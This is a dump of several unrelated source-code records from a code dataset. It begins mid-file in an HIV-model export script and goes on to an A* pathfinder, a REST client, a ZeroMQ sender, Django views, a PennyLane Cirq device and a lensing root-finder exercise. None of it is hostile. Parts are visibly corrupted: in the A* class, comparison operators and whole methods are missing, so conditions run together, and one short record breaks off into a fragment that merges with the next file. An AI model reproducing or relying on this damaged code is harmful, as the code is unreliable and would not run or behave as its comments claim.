df.to_excel(writer, sheet_name='Deaths-Overall')\n writer.save()\n del df\n\n #Save per pop data\n for x in range (0, len(R.popkeys)): \n df = DataFrame({'Current allocation '+R.popkeys[x]: R.main['numdeath'].pops['Current allocation'][x],\n 'Optimal allocation '+R.popkeys[x]: R.main['numdeath'].pops['Optimal allocation'][x]})\n \n writer = ExcelWriter('Deaths '+R.popkeys[x]+'.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='Deaths-'+R.popkeys[x])\n writer.save()\n del df\n ####################################################################################################################\n #Copy Number PLHIV to file:\n df = DataFrame({'Current allocation': R.main['numplhiv'].tot['Current allocation'], \n 'Optimal allocation': R.main['numplhiv'].tot['Optimal allocation'],})\n\n writer = ExcelWriter('PLHIV-Overall.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='PLHIV-Overall')\n writer.save()\n del df\n\n #Save per pop data\n for x in range (0, len(R.popkeys)): \n df = DataFrame({'Current allocation '+R.popkeys[x]: R.main['numplhiv'].pops['Current allocation'][x],\n 'Optimal allocation '+R.popkeys[x]: R.main['numplhiv'].pops['Optimal allocation'][x]})\n \n writer = ExcelWriter('PLHIV '+R.popkeys[x]+'.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='PLHIV-'+R.popkeys[x])\n writer.save()\n del df\n ####################################################################################################################\n #Copy Number Diagnosed PLHIV to file:\n df = DataFrame({'Current allocation': R.main['numdiag'].tot['Current allocation'], \n 'Optimal allocation': R.main['numdiag'].tot['Optimal allocation'],})\n\n writer = ExcelWriter('DiagPLHIV-Overall.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='DiagPLHIV-Overall')\n writer.save()\n del df\n\n #Save per pop data\n for x in range (0, len(R.popkeys)): \n df = DataFrame({'Current allocation '+R.popkeys[x]: R.main['numdiag'].pops['Current allocation'][x],\n 'Optimal allocation '+R.popkeys[x]: R.main['numdiag'].pops['Optimal allocation'][x]})\n \n writer = ExcelWriter('DiagPLHIV '+R.popkeys[x]+'.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='DiagPLHIV-'+R.popkeys[x])\n writer.save()\n del df\n ####################################################################################################################\n #Copy Number Diagnosed PLHIV to file:\n df = DataFrame({'Current allocation': R.main['numdiag'].tot['Current allocation'], \n 'Optimal allocation': R.main['numdiag'].tot['Optimal allocation'],})\n\n writer = ExcelWriter('DiagPLHIV-Overall.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='DiagPLHIV-Overall')\n writer.save()\n del df\n\n #Save per pop data\n for x in range (0, len(R.popkeys)): \n df = DataFrame({'Current allocation '+R.popkeys[x]: R.main['numdiag'].pops['Current allocation'][x],\n 'Optimal allocation '+R.popkeys[x]: R.main['numdiag'].pops['Optimal allocation'][x]})\n \n writer = ExcelWriter('DiagPLHIV '+R.popkeys[x]+'.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='DiagPLHIV-'+R.popkeys[x])\n writer.save()\n del df\n ####################################################################################################################\n #Copy PLHIV on Treatment to file:\n df = DataFrame({'Current allocation': R.main['numtreat'].tot['Current allocation'], \n 'Optimal allocation': R.main['numtreat'].tot['Optimal allocation'],})\n\n writer = ExcelWriter('Treatment-Overall.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='Treatment-Overall')\n writer.save()\n del df\n\n #Save per pop data\n for x in range (0, len(R.popkeys)): \n df = DataFrame({'Current allocation '+R.popkeys[x]: R.main['numtreat'].pops['Current allocation'][x],\n 'Optimal allocation '+R.popkeys[x]: R.main['numtreat'].pops['Optimal allocation'][x]})\n \n writer = ExcelWriter('Treatment '+R.popkeys[x]+'.xlsx', engine = 'xlsxwriter')\n df.to_excel(writer, sheet_name='Treatment-'+R.popkeys[x])\n writer.save()\n del df\n\nif 'saveproject' in torun:\n\n print(' Saving Colombia project')\n from optima import saveobj\n saveobj(newprojectfile, P)\n \n \n\n","sub_path":"colombia/fullcolombia2.py","file_name":"fullcolombia2.py","file_ext":"py","file_size_in_byte":31574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"210566439","text":"import numpy as np\r\nimport heapq\r\nimport copy\r\nimport os\r\nimport imageio\r\nimport shutil\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\n\r\n# PriorityQueue\r\nclass PriorityQueue:\r\n def __init__(self):\r\n self.elements =[]\r\n\r\n def empty(self):\r\n return not self.elements\r\n\r\n def put(self, coordination, priority):\r\n heapq.heappush(self.elements, (priority, coordination))\r\n\r\n def get(self,):\r\n return heapq.heappop(self.elements)[1]\r\n\r\nclass astar_algo:\r\n def __init__(self,mapsize,start_point,end_point,cost_map):\r\n self.map_size=mapsize\r\n self.start_point = start_point\r\n self.end_point = end_point\r\n self.cost_map = cost_map\r\n\r\n # Get neighbors of current position\r\n def get_neighbors(self,current):\r\n neighbors = set()\r\n # Down\r\n if current[0]+1=0:\r\n neighbors.add((current[0],current[1]-1))\r\n # Up\r\n if current[0]-1>=0:\r\n neighbors.add((current[0]-1,current[1]))\r\n # Right\r\n if current[1]+1 (Backwards from the goal to the start)\r\n current = self.end_point\r\n path = []\r\n while current != self.start_point:\r\n path.append(current)\r\n current = came_from[current]\r\n path.append(self.start_point)\r\n path.reverse()\r\n\r\n return path\r\n\r\n def visualization(self,path):\r\n # Save the problem as a figure\r\n path_map = np.zeros((self.map_size[0],self.map_size[1],3))\r\n path_map[self.start_point[0],self.start_point[1],1]=255\r\n path_map[self.end_point[0],self.end_point[1],1]=255\r\n path_map[:,:,0]=self.cost_map\r\n\r\n os.makedirs('./temp_gif', exist_ok=True)\r\n images_gif=[]\r\n #initial\r\n plt.imshow(path_map, cmap=cm.OrRd)\r\n plt.imshow(self.cost_map,cmap=cm.coolwarm, alpha=0.4)\r\n plt.axis('off')\r\n plt.tight_layout()\r\n plt.savefig('./Problem.png',dpi=100)\r\n plt.savefig('./temp_gif/result' + str(0) +'.png',dpi=100)\r\n images_gif.append(imageio.imread('./temp_gif/result' + str(0) +'.png'))\r\n plt.close()\r\n for i,pos in enumerate(path):\r\n path_map[pos[0],pos[1]]=255\r\n plt.imshow(path_map, cmap=cm.OrRd)\r\n plt.imshow(self.cost_map,cmap=cm.coolwarm, alpha=0.4)\r\n plt.axis('off')\r\n plt.tight_layout()\r\n plt.savefig('./temp_gif/result' + str(i+1) +'.png',dpi=100)\r\n images_gif.append(imageio.imread('./temp_gif/result' + str(i+1) +'.png'))\r\n plt.close()\r\n imageio.mimsave('./Result_Astar.gif',images_gif)\r\n\r\n shutil.rmtree('./temp_gif')\r\n return path\r\n\r\n","sub_path":"algorithms/astar_algorithm.py","file_name":"astar_algorithm.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"354076840","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n'''BlendNet Manager Client\n\nDescription: Manager REST client\n'''\n\nimport os\nimport json\nimport urllib # To quote the url path values\nfrom io import StringIO\n\nfrom .Client import (\n Client,\n ClientEngine,\n)\n\nclass ManagerClient(Client):\n _engine = None\n\n def __init__(self, address, cfg):\n if not ManagerClient._engine:\n ManagerClient._engine = ClientEngine(address, cfg)\n else:\n ManagerClient._engine._address = address\n ManagerClient._engine._cfg = cfg\n\n def resources(self):\n '''Get the list of agents with info'''\n res = self._engine.get('resources')\n if not res:\n return {'agents': {}}\n if not res.get('manager'):\n return {'agents': res.get('agents', {})}\n\n # Set the client ip if manager have not provided the addresses\n if not res['manager'].get('ip'):\n res['manager']['ip'] = self._engine._address\n if not res['manager'].get('internal_ip'):\n res['manager']['internal_ip'] = self._engine._address\n\n return res\n\n def agentCreate(self, agent_name, conf):\n '''Create the new agent'''\n path = 'agent/%s/config' % (urllib.parse.quote(agent_name),)\n data = json.dumps(conf)\n stream = StringIO(data)\n\n return self._engine.put(path, stream, len(data))\n\n def agentRemove(self, agent_name):\n '''Remove the agent from the manager'''\n return self._engine.delete('agent/' + urllib.parse.quote(agent_name))\n\n def agentLog(self, agent_name):\n '''Get the log information for the agent'''\n return self._engine.get('agent/%s/log' % (urllib.parse.quote(agent_name),))\n\n def calculateChecksum(self, stream):\n '''Will calculate and redurn checksum and reset stream'''\n import hashlib\n sha1_calc = hashlib.sha1()\n for chunk in iter(lambda: stream.read(1048576), b''):\n sha1_calc.update(chunk)\n stream.seek(0)\n return sha1_calc.hexdigest()\n\n def taskFilePut(self, task, file_path, rel_path):\n '''Send file to the task file'''\n if not os.path.isfile(file_path):\n print('ERROR: Unable to send not existing file \"%s\"' % file_path)\n return None\n\n size = os.path.getsize(file_path)\n\n with open(file_path, 'rb') as f:\n return self.taskFileStreamPut(task, rel_path, f, size, self.calculateChecksum(f))\n\n def taskResultDownload(self, task, result, out_path):\n '''Will download result name (preview/render) into the file'''\n return self._engine.download('task/%s/status/result/%s' % (task, result), out_path)\n","sub_path":"BlendNet/ManagerClient.py","file_name":"ManagerClient.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"299243790","text":"import numpy\nimport zmq\nimport functools\nimport uuid\nimport cv2\n\ndef array_to_msg(nparray):\n \"\"\"\n Convert a numpy ndarray to its multipart zeromq message representation.\n The return list is composed of:\n 0. The string representation of the array element type, i.e. 'float32'\n 1. The binary string representation of the shape of the array converted to a numpy array with dtype int32\n 2. The binary string representation of the array\n These informations together can be used from the receiver code to recreate\n uniquely the original array.\n @param nparray: A numpy ndarray\n @type nparray: numpy.ndarray\n @rtype: list\n @return: [dtype, shape, array]\n \"\"\"\n _shape = numpy.array(nparray.shape, dtype=numpy.int32)\n return [nparray.dtype.name.encode(),\n _shape.tobytes(),\n nparray.tobytes()]\n\ndef msg_to_array(msg):\n \"\"\"\n reverse the array_to_message function in order to recover the proper\n serialization of the array.\n @param msg: the array representation in a list as serizlized by\n array_to_msg\n @return: the numpy array\n \"\"\"\n _dtype_name = msg[0].decode()\n _shape = numpy.fromstring(msg[1], numpy.int32)\n _array = numpy.fromstring(msg[2], _dtype_name)\n return (_dtype_name, _shape, _array.reshape(tuple(_shape)))\n\ndef sender_msg_to_array(msg):\n \"\"\"\n Parse a list argument as returned by L{array_to_msg} function of this\n module, and returns the numpy array contained in the message body.\n @param msg: a list as returned by L{array_to_msg} function\n @rtype: numpy.ndarray\n @return: The numpy array contained in the message\n \"\"\"\n [_dtype, _shape, _bin_msg] = msg_to_array(msg[2:])\n _uuid = uuid.UUID(bytes=msg[0])\n _data_name = msg[1].decode()\n return (_uuid, _data_name, _dtype, _shape, _bin_msg)\n\ndef numpy_array_sender(name, endpoint, sender_id=\"\", socket_type=zmq.PUSH):\n \"\"\"\n Decorator Factory\n The decorated function will have to return a numpy array, while the\n decorator will create a zmq socket of the specified socket type connected\n to the specified endpoint.\n Each time the function is called the numpy array will be sent over the\n instantiated transport after being converted to a multipart message using\n L{array_to_msg} function. The multipart message is prepended with a UUID\n and the given name as the first two elements.\n #TODO: Would it be good to add the possibility of transimitting arbitrary\n metadata? --- Marco Bartolini 27/04/2012\n Usage example::\n import zmq\n import zmqnumpy\n import numpy\n @zmqnumpy.numpy_array_sender(\\\"mysender\\\", \\\"tcp://127.0.0.1:8765\\\")\n def random_array_generator(min, max, width):\n return numpy.random.randint(min, max, width)\n @type name: string\n @param name: the label of the data stream\n @type endpoint: string\n @param endpoint: a zmq endpoint made as \\\"protocol://host:port\\\"\n @param sender_id: sender identifier, if not given a uuid will be generated\n automatically\n @param socket_type: a zmq socket type such as zmq.PUSH or zmq.PUB\n \"\"\"\n _context = zmq.Context.instance()\n _socket = _context.socket(socket_type)\n _socket.connect(endpoint)\n if not sender_id:\n _uuid = uuid.uuid4().bytes\n else:\n _uuid = sender_id\n def wrapper(fn):\n @functools.wraps(fn)\n def wrapped(*args, **kwargs):\n _data = fn(*args, **kwargs)\n print(len(array_to_msg(_data)[2]))\n _socket.send_multipart([_uuid, name.encode()] + array_to_msg(_data))\n return wrapped\n return wrapper\n\n\n\ndef send():\n cap_idx = input(\"Capture Device: \")\n cap = cv2.VideoCapture(int(cap_idx), cv2.CAP_AVFOUNDATION)\n if not (cap.isOpened()):\n print(\"could not open device\")\n exit()\n\n @numpy_array_sender(\"mysender\", \"tcp://127.0.0.1:8765\")\n def frameYielder():\n nonlocal cap\n ret, frame = cap.read()\n print(frame.shape)\n return frame\n for _ in range(1000):\n frameYielder()\n \n \n cap.release()\n \nif __name__ == \"__main__\":\n send()","sub_path":"zmq_tests/fast.py","file_name":"fast.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"53294298","text":"from django.shortcuts import render_to_response\nfrom django.contrib.auth.decorators import login_required\n\nfrom formtools.wizard.views import SessionWizardView\n\nfrom .models import Report, ProtectedClass\nfrom .model_variables import PROTECTED_CLASS_CODES\n\n\n@login_required\ndef IndexView(request):\n latest_reports = Report.objects.order_by('-create_date')\n data = []\n # formatting protected class\n for report in latest_reports:\n p_class_list = []\n for p_class in report.protected_class.all().order_by('form_order'):\n if p_class.protected_class is not None:\n code = PROTECTED_CLASS_CODES.get(p_class.protected_class, p_class.protected_class)\n if code != 'Other':\n p_class_list.append(code)\n # If this code is other but there is no other_class description, we want it to say \"Other\". If there is an other_class that will take the place of \"Other\"\n elif report.other_class is None:\n p_class_list.append(code)\n\n if report.other_class:\n p_class_list.append(report.other_class)\n if len(p_class_list) > 3:\n p_class_list = p_class_list[:3]\n p_class_list[2] = f'{p_class_list[2]}...'\n data.append({\n \"report\": report,\n \"report_protected_classes\": p_class_list\n })\n\n return render_to_response('forms/index.html', {'data_dict': data})\n\n\nTEMPLATES = [\n # Contact\n 'forms/report_grouped_questions.html',\n # Protected Class\n 'forms/report_class.html',\n # Details\n 'forms/report_details.html',\n]\n\n\nclass CRTReportWizard(SessionWizardView):\n \"\"\"Once all the sub-forms are submitted this class will clean data and save.\"\"\"\n def get_template_names(self):\n return [TEMPLATES[int(self.steps.current)]]\n\n def get_context_data(self, form, **kwargs):\n context = super(CRTReportWizard, self).get_context_data(form=form, **kwargs)\n\n # This name appears in the progress bar wizard\n ordered_step_names = [\n 'Contact',\n 'Protected Class',\n 'Details',\n # 'What Happened',\n # 'Where',\n # 'Who',\n ]\n current_step_name = ordered_step_names[int(self.steps.current)]\n\n # This title appears in large font above the question elements\n ordered_step_titles = [\n 'Contact',\n 'Please provide details',\n 'Details'\n ]\n current_step_title = ordered_step_titles[int(self.steps.current)]\n\n context.update({\n 'ordered_step_names': ordered_step_names,\n 'current_step_title': current_step_title,\n 'current_step_name': current_step_name\n })\n\n if current_step_name == 'Details':\n context.update({\n 'page_subtitle': 'Please describe what happened in your own words',\n 'page_note': 'Continued'\n })\n\n return context\n\n def done(self, form_list, form_dict, **kwargs):\n form_data_dict = self.get_all_cleaned_data()\n m2mfield = form_data_dict.pop('protected_class')\n r = Report.objects.create(**form_data_dict)\n\n # Many to many fields need to be added or updated to the main model, with a related manager such as add() or update()\n for protected in m2mfield:\n p = ProtectedClass.objects.get(protected_class=protected)\n r.protected_class.add(p)\n\n r.save()\n # adding this back for the save page results\n form_data_dict['protected_class'] = m2mfield.values()\n\n return render_to_response('forms/confirmation.html', {'data_dict': form_data_dict})\n","sub_path":"crt_portal/cts_forms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"617392195","text":"def zfill(s):\r\n #fungsi ini untuk menambahkan satu angka 0 pada string s\r\n #digunakan terutama untuk representasi penanggalan bagi hari / bulan\r\n #prekondisi: s haruslah literal string yang hanya berisi angka\r\n \r\n if len(s) == 1:\r\n s = '0' + s\r\n #selain berjumlah karakter sama dengan satu, tidak akan diutak-atik\r\n\r\n return s\r\n#-----------------------------------------------------------------------\r\ndef FormShow(form, parameter):\r\n uip = form.GetUIPartByName('uipUserInfo')\r\n uipFilter = form.GetUIPartByName('uipFilter')\r\n \r\n if uip.isBackOffice:\r\n #matikan lookup branch\r\n form.GetControlByName('pFilter.LBranch').Enabled = 0\r\n \r\ndef bTampilkanClick(sender):\r\n uip = sender.OwnerForm.GetUIPartByName('uipUserInfo')\r\n uipFilter = sender.OwnerForm.GetUIPartByName('uipFilter')\r\n\r\n awalTanggal = uipFilter.GetFieldValue('AwalTanggal')\r\n akhirTanggal = uipFilter.GetFieldValue('AkhirTanggal')\r\n\r\n #cek branch code\r\n if uipFilter.GetFieldValue('LBranch.branch_code') == None or \\\r\n uipFilter.GetFieldValue('LBranch.branch_code') == '':\r\n sender.OwnerForm.ShowMessage('Kode dan Nama Cabang belum dipilih, mohon untuk dipilih dahulu!')\r\n return\r\n\r\n #cek rentang tanggal filter\r\n if (awalTanggal[:3] > akhirTanggal[:3]):\r\n sender.OwnerForm.ShowMessage('Rentang tanggal filter salah, mohon untuk dibetulkan dahulu.')\r\n return\r\n\r\n #Daftar transaksi DPLK biasa sudah terotorisasi\r\n #sementara pake nama variable yang agak aneh\r\n sNotAuthCondition = 'isCommitted = \\'T\\' and'\r\n\r\n if uip.isBackOffice:\r\n #bakcoffice user\r\n sCondition = 'branch_code = \\'%s\\' and' % (uip.BranchCode)\r\n else:\r\n #maybe ROOT or ADMIN user\r\n sCondition = 'branch_code = \\'%s\\' and' \\\r\n % (uipFilter.GetFieldValue('LBranch.branch_code'))\r\n\r\n #set parameter OQL and show it\r\n query = sender.OwnerForm.GetPanelByName('qTransaksi')\r\n query.OQLText = 'select from TransaksiDPLK [%s %s ' \\\r\n 'tgl_transaksi >= :tanggal_awal and tgl_transaksi <= :tanggal_akhir] ' \\\r\n '(tgl_transaksi as Tanggal_Transaksi, ' \\\r\n 'no_peserta as Nomor_Peserta, ' \\\r\n 'LJenisTransaksiDPLK.nama_transaksi as Kode_Jenis_Transaksi, ' \\\r\n 'branch_code as Kode_Cabang, ' \\\r\n 'isCommitted as Status_Otorisasi, ' \\\r\n 'tgl_otorisasi as Tanggal_Otorisasi, ' \\\r\n 'keterangan as Keterangan, ' \\\r\n 'LTransactionBatch.ID_TransactionBatch as idbatch, ' \\\r\n 'LTransactionBatch.no_batch as nobatch, ' \\\r\n 'ID_Transaksi,' \\\r\n 'kode_jenis_transaksi as hidden_kode_Jenis_Transaksi, ' \\\r\n 'self) then order by Tanggal_Transaksi;' % (sCondition, sNotAuthCondition)\r\n\r\n #setting date untuk OQL: mm/dd/yyyy\r\n awalTanggal = '%s/%s/%d' % (zfill(str(awalTanggal[1])), \\\r\n zfill(str(awalTanggal[2])),awalTanggal[0])\r\n\r\n akhirTanggal = '%s/%s/%d' % (zfill(str(akhirTanggal[1])), \\\r\n zfill(str(akhirTanggal[2])),akhirTanggal[0])\r\n \r\n query.SetParameter('tanggal_awal',awalTanggal)\r\n query.SetParameter('tanggal_akhir',akhirTanggal)\r\n \r\n query.DisplayData()\r\n","sub_path":"dialogs/transaksi/OLD_Form/fDaftarTransaksiDPLKTerotorisasi_intr.py","file_name":"fDaftarTransaksiDPLKTerotorisasi_intr.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"42865758","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sys\n\nnnx = 514\nnny = 514\nnnz = 257\nhead = (\"head\",\"= 1.\n qubits (List[cirq.Qubit]): a list of Cirq qubits that are used\n as wires. The wire number corresponds to the index in the list.\n By default, an array of ``cirq.LineQubit`` instances is created.\n \"\"\"\n\n name = \"Cirq Abstract PennyLane plugin baseclass\"\n pennylane_requires = \">=0.9.0\"\n version = __version__\n author = \"Xanadu Inc\"\n _capabilities = {\n \"model\": \"qubit\",\n \"tensor_observables\": True,\n \"inverse_operations\": True,\n }\n\n short_name = \"cirq.base_device\"\n\n def __init__(self, wires, shots, analytic, qubits=None):\n super().__init__(wires, shots, analytic)\n\n self.circuit = None\n\n if qubits:\n if wires != len(qubits):\n raise qml.DeviceError(\n \"The number of given qubits and the specified number of wires have to match. Got {} wires and {} qubits.\".format(\n wires, len(qubits)\n )\n )\n\n self.qubits = qubits\n else:\n self.qubits = [cirq.LineQubit(wire) for wire in range(wires)]\n\n # Add inverse operations\n self._inverse_operation_map = {}\n for key in self._operation_map:\n if not self._operation_map[key]:\n continue\n\n # We have to use a new CirqOperation instance because .inv() acts in-place\n inverted_operation = CirqOperation(self._operation_map[key].parametrization)\n inverted_operation.inv()\n\n self._inverse_operation_map[key + Operation.string_for_inverse] = inverted_operation\n\n self._complete_operation_map = {\n **self._operation_map,\n **self._inverse_operation_map,\n }\n\n _operation_map = {\n \"BasisState\": None,\n \"QubitStateVector\": None,\n \"QubitUnitary\": CirqOperation(cirq.MatrixGate),\n \"PauliX\": CirqOperation(lambda: cirq.X),\n \"PauliY\": CirqOperation(lambda: cirq.Y),\n \"PauliZ\": CirqOperation(lambda: cirq.Z),\n \"Hadamard\": CirqOperation(lambda: cirq.H),\n \"S\": CirqOperation(lambda: cirq.S),\n \"T\": CirqOperation(lambda: cirq.T),\n \"CNOT\": CirqOperation(lambda: cirq.CNOT),\n \"SWAP\": CirqOperation(lambda: cirq.SWAP),\n \"CZ\": CirqOperation(lambda: cirq.CZ),\n \"PhaseShift\": CirqOperation(lambda phi: cirq.ZPowGate(exponent=phi / np.pi)),\n \"RX\": CirqOperation(cirq.rx),\n \"RY\": CirqOperation(cirq.ry),\n \"RZ\": CirqOperation(cirq.rz),\n \"Rot\": CirqOperation(lambda a, b, c: [cirq.rz(a), cirq.ry(b), cirq.rz(c)]),\n \"CRX\": CirqOperation(lambda phi: cirq.ControlledGate(cirq.rx(phi))),\n \"CRY\": CirqOperation(lambda phi: cirq.ControlledGate(cirq.ry(phi))),\n \"CRZ\": CirqOperation(lambda phi: cirq.ControlledGate(cirq.rz(phi))),\n \"CRot\": CirqOperation(\n lambda a, b, c: [\n cirq.ControlledGate(cirq.rz(a)),\n cirq.ControlledGate(cirq.ry(b)),\n cirq.ControlledGate(cirq.rz(c)),\n ]\n ),\n \"CSWAP\": CirqOperation(lambda: cirq.CSWAP),\n \"Toffoli\": CirqOperation(lambda: cirq.TOFFOLI),\n }\n\n _observable_map = {\n \"PauliX\": None,\n \"PauliY\": None,\n \"PauliZ\": None,\n \"Hadamard\": None,\n \"Hermitian\": None,\n \"Identity\": None,\n }\n\n def reset(self):\n # pylint: disable=missing-function-docstring\n super().reset()\n\n self.circuit = cirq.Circuit()\n\n @property\n def observables(self):\n # pylint: disable=missing-function-docstring\n return set(self._observable_map.keys())\n\n @property\n def operations(self):\n # pylint: disable=missing-function-docstring\n return set(self._operation_map.keys())\n\n @abc.abstractmethod\n def _apply_basis_state(self, basis_state_operation):\n \"\"\"Apply a basis state preparation.\n\n Args:\n basis_state_operation (pennylane.BasisState): the BasisState operation instance that shall be applied\n\n Raises:\n NotImplementedError: when not implemented in the subclass\n \"\"\"\n raise NotImplementedError\n\n @abc.abstractmethod\n def _apply_qubit_state_vector(self, qubit_state_vector_operation):\n \"\"\"Apply a state vector preparation.\n\n Args:\n qubit_state_vector_operation (pennylane.QubitStateVector): the QubitStateVector operation instance that shall be applied\n\n Raises:\n NotImplementedError: when not implemented in the subclass\n \"\"\"\n raise NotImplementedError\n\n def _apply_operation(self, operation):\n \"\"\"Apply a single PennyLane Operation.\n\n Args:\n operation (pennylane.Operation): The operation that shall be applied\n \"\"\"\n cirq_operation = self._complete_operation_map[operation.name]\n\n # If command is None do nothing\n if cirq_operation:\n cirq_operation.parametrize(*operation.parameters)\n\n self.circuit.append(\n cirq_operation.apply(*[self.qubits[wire] for wire in operation.wires])\n )\n\n def apply(self, operations, **kwargs):\n # pylint: disable=missing-function-docstring\n rotations = kwargs.pop(\"rotations\", [])\n\n for i, operation in enumerate(operations):\n if i > 0 and operation.name in {\"BasisState\", \"QubitStateVector\"}:\n raise qml.DeviceError(\n \"The operation {} is only supported at the beginning of a circuit.\".format(\n operation.name\n )\n )\n\n if operation.name == \"BasisState\":\n self._apply_basis_state(operation)\n elif operation.name == \"QubitStateVector\":\n self._apply_qubit_state_vector(operation)\n else:\n self._apply_operation(operation)\n\n # TODO: get pre rotated state here\n\n # Diagonalize the given observables\n for operation in rotations:\n self._apply_operation(operation)\n","sub_path":"pennylane_cirq/cirq_device.py","file_name":"cirq_device.py","file_ext":"py","file_size_in_byte":7576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"571064079","text":"class Solution:\n def canReach(self, arr: List[int], start: int) -> bool:\n visited, q = set(), set([start]) #Inialize visited set which is empty and queue set which contains only start index. \n while q: #BFS.\n nextq = set() #Initialize next queue set.\n visited |= q #Union visited set with q set so all index in q are visited.\n for x in q: #Iterate through queue set.\n if not arr[x]: #If the value in current index is 0, return true.\n return True\n right, left = x + arr[x], x - arr[x] #Get the indexes after jump right and jump left.\n if right < len(arr) and right not in visited: #If jump right to an unvisited index, add the new index to next queue.\n nextq.add(right)\n if left >= 0 and left not in visited: #If jump right to an unvisited index, add the new index to next queue.\n nextq.add(left)\n q = nextq #Replace queue with next queue.\n return False ","sub_path":"problems/jump_game_iii/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"321791597","text":"# Realizar un programa que pida la cantidad de iteracciones y que muestre en cada interaccion un mensaje diferente\nclass Mensajes:\n \"\"\"docstring for Mensajes.\"\"\"\n def __init__(self):\n super(Mensajes, self).__init__()\n self.n = int(input('Iteraciones: '))\n self.iteraciones()\n def iteraciones(self):\n for i in range(self.n):\n if i%2:\n print('asdasdasd')\n else:\n print('wadawdgxd')\nm = Mensajes()\n","sub_path":"second/second/iterativos.py","file_name":"iterativos.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"230137237","text":"import rootfinder\nimport interpolation\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport astropy.units as u\nfrom astropy import constants as const\n\nplt.rc(\"font\" , size = 13)\n\ndef\tf(t):\n\t'''\n\tThis function returns N_e(t) for the pseudo-isothermal sphere\n\tTakes in a number t which is equal to x / r_c\n\t'''\n\treturn (1 + t ** 2) ** (-0.5) - .5\n\ndef fprime(t):\n\t'''\n\tThis function returns the derivative of N_e(t) with respect to t\n\tThis is meant to be used with the Newton method\n\tAs above, t = x / r_c\n\t'''\n\t\n\treturn -1 * t / ((1 + t ** 2) ** 1.5)\n\t\n\t\ndef gausslens(wlength , N0 , D , a):\n\t'''\n\tThis is the lense equation given for the gaussian lens.\n\tTakes in several parameters of the lense.\n\twlength is a wavelength, N0 is the central column density, a is a characteristic size\n\tD is the distance to the lense\n\treturns a function of x that rturns x prime\n\t'''\n\t\n\t#re = const.e.esu ** 2 / (const.m_e * const.c ** 2)\n\tre = 2.817940328e-15 * u.m\n\treturn lambda x: x * (1 + ((wlength ** 2 * N0 * re * D) /(np.pi * a * a)) * np.exp(-((x / a) ** 2)))\n\t\ndef isothermallens(wlength , N0 , D , rc):\n\t'''\n\tThis is the lense equation for the isothermal lens.\n\tTakes in several parameters of the lense.\n\twlength is a wavelength, N0 is the central column density, rc is a characteristic size\n\tD is the distance to the lense\n\treturns a function of x that rturns x prime\n\t'''\n\tre = 2.817940328e-15 * u.m\n\tc = (((wlength ** 2 * re) / (2 * np.pi))) ###theta_r = c * d/dx N_e(x)\n\ttheta_r = lambda x: c * (N0 * x * -1) / (rc ** 2 * (1 + (x / rc) ** 2) ** 1.5)\n\t\n\n\treturn lambda x: (x + D * theta_r(x))\n\t\ndef ray_tracing(L , spacing , xlow , xhigh):\n\t'''\n\tProduces a ray tracing plot, like on the first page of the HW.\n\tL should be a function of x that returns x prime\n\tSuch a function caan be produces using gausslens or isothermallens\n\tspacing is the space between incoming rays\n\txlow and xhigh are the lowest and highest x values for the incoming rays\n\tNo returns\n\t'''\n\t\n\tspacing *= u.au\n\tx = xlow * u.au\n\t\n\t\n\twhile x.value < xhigh:\n\t\tplt.plot([x.value , L(x).value] , [1 , 0] , color = 'b' , linewidth = .5)\n\t\t\n\t\tx += spacing\n\t\t\n\tplt.xlabel(\"x (AU)\")\n\tplt.ylabel(\"Distance (Kpc)\")\n\tplt.show()\n\t\t\n\t\n\t\ndef problem_3():\n\t\n\t'''\n\tMy code for problem 3. This will determine the FWHM and produce the desired plots.\n\tNo returns\n\tWill produce a plot\n\t'''\n\tthresh = 1\n\tth = []\n\tbi_iter = []\n\ts_iter = []\n\tn_iter = []\n\twhile thresh > 1e-10: ###loop generates data for our plots\n\t\n\t\tb_value , b_niter = rootfinder.bisection(f , -5 , 0 , thresh, True) #bisection method\n\t\t\n\t\ts_value , s_niter = rootfinder.Secant(f , -5 , 0 , thresh, True) #Newton method\n\t\t\n\t\tnv , ni = rootfinder.Newton(f , fprime , -5 , thresh , True) #Secant method\n\t\t\n\t\tth.append(np.log10(thresh))\n\t\tbi_iter.append(b_niter)\n\t\tn_iter.append(ni)\n\t\ts_iter.append(s_niter)\n\t\t\n\t\tthresh /=1.5 #lowers threshold\n\t\t\n\t###Now we plot the resutls\n\tplt.plot(th , bi_iter , label = \"Bisection\")\n\tplt.plot(th , s_iter , label = \"Secant\")\n\tplt.plot(th , n_iter , label = \"Newton\")\n\tplt.legend()\n\tplt.xlabel(\"log(threshold)\")\n\tplt.ylabel(\"Number of Iterations\")\n\tplt.show()\n\t\n\t###Print out the value of the 